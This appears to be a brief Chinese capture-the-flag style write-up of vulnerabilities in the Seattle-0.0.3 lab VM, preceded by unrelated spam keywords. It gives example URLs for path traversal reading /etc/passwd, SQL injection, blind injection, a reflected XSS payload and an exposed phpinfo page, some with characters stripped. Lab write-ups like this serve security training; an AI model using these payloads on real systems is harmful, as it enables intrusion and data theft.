成品网站源码在线观看,网站定位与建设,经典营销型网站,汕头站扩建后比哪个站大环境#xff1a;vuluhub Seattle-0.0.3 1.catelogue处任意文件下载(目录穿越)
http://192.168.85.139/download.php?item../../../../../../etc/passwd
有个admin目录#xff0c;可以下载里面的文件进行读取 2.cltohes详情页面处(参数prod)存在sql报错注入
http://192.16…环境vuluhub Seattle-0.0.3 1.catelogue处任意文件下载(目录穿越)
http://192.168.85.139/download.php?item../../../../../../etc/passwd
有个admin目录可以下载里面的文件进行读取 2.cltohes详情页面处(参数prod)存在sql报错注入
http://192.168.85.139/details.php?prod5type2 3.vily处存在布尔盲注(或时间盲注)
http://192.168.85.139/?type1 and 11
4.blog处用户名泄露 5.登陆处存在用户名枚举 6.blog处存在xss
http://192.168.85.139/blog.php?authorscriptalert(5)/script
7.phpinfo页面泄露
http://192.168.85.139/info.php
